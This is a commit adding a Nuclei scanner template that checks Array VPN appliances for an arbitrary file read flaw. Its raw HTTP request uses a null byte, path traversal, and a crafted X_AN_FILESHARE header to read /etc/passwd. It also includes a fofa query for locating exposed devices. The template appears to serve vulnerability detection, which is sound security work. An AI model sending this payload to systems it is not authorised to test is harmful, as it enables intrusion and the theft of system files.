Merge pull request #9864 from projectdiscovery/pussycat0x-patch-12

Create array-vpn-lfi.yaml
2024-05-28 07:16:33 +05:30 · 2024-05-28 07:16:33 +05:30 · 6a008862eb
parent 910f87df3a fc1914cbbd
commit 6a008862eb
1 changed files with 39 additions and 0 deletions
--- a/http/vulnerabilities/other/array-vpn-lfi.yaml
+++ b/http/vulnerabilities/other/array-vpn-lfi.yaml
@ -0,0 +1,39 @@
+id: array-vpn-lfi
+
+info:
+  name: Array VPN - Arbitrary File Reading Vulnerability
+  author: pussycat0x
+  severity: high
+  description: |
+    Array VPN Arbitrary File Reading Vulnerability
+  reference:
+    - https://github.com/wy876/POC/blob/main/Array%20VPN%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
+  metadata:
+    fofa-query: product="Array-VPN"
+    max-request: 1
+    verified: true
+  tags: lfi,vpn,arrayvpn
+
+http:
+  - raw:
+      - |
+        GET /prx/000/http/localhost/client_sec/%00../../../addfolder HTTP/1.1
+        Host: {{Hostname}}
+        Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
+        Accept-Encoding: gzip, deflate
+        X_AN_FILESHARE: uname=t; password=t; sp_uname=t; flags=c3248;fshare_template=../../../../../../../../etc/passwd
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "/prx/001/http/localh"
+
+      - type: regex
+        regex:
+          - "root:.*:0:0:"
+
+      - type: status
+        status:
+          - 401